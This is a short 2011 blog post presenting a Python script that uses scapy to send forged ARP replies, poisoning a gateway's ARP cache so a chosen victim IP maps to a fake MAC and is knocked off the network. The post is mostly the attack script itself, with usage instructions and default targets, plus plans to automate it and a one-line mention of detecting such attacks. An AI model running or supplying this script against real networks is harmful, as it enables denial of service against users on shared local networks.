Thursday, December 1, 2011

Simple ARP poison script in python

A quick python script to DoS a host on the network. It uses scapy and you can set default values in the script. The attack relies on ARP poisoning and the ARP entries on arp_dest_ip are flooded with a fake victim_mac. The target's IP address is specified by victim_ip.

Here's the script:

#!/usr/bin/python
#DoS.py
#Default target is 10.0.3.3
import sys
from scapy.all import *

try:
      if(sys.argv[1] == "-h"):
            print("Usage:")
           print("DoS [victim_ip] [arp_dest_ip] [arp_dest_mac] [victim_mac]")
           exit(0)
except IndexError:
      print("Attacking....")

x=ARP()
x.op=2
try:
      x.psrc=sys.argv[1] #SOURCE_IP
except IndexError:
      x.psrc="10.0.3.3"
try:
      x.hwsrc=sys.argv[4] #SOURCE_MAC
except IndexError:
      x.hwsrc="FF:FF:FF:FF:FF:FF" #Put a fake MAC address here
try:
      x.pdst=sys.argv[2] #DEST_IP
      x.hwdst=sys.argv[3] #DEST_MAC
except IndexError:
      x.pdst="10.0.3.1" #Usually contains the IP of the gateway
      x.hwdst="FF:FF:FF:AB:CD:EF" #Should contain the MAC of the IP defined as x.pdst
x.show()

sr(x,inter=0.0000000000000001,retry=-999999999,timeout=0.00000000000001)

Next I would want to automate most of the stuff above where minimum inputs would be required and other kind of logic where the attacker pauses attack if the target quits the network etc.

I am also thinking about how to thwart or raise an alert on such an attack...

P.S. I know scapy has pre-defined functions to conduct ARP attacks...I'm doing it manually just for the kicks...

No comments:

Post a Comment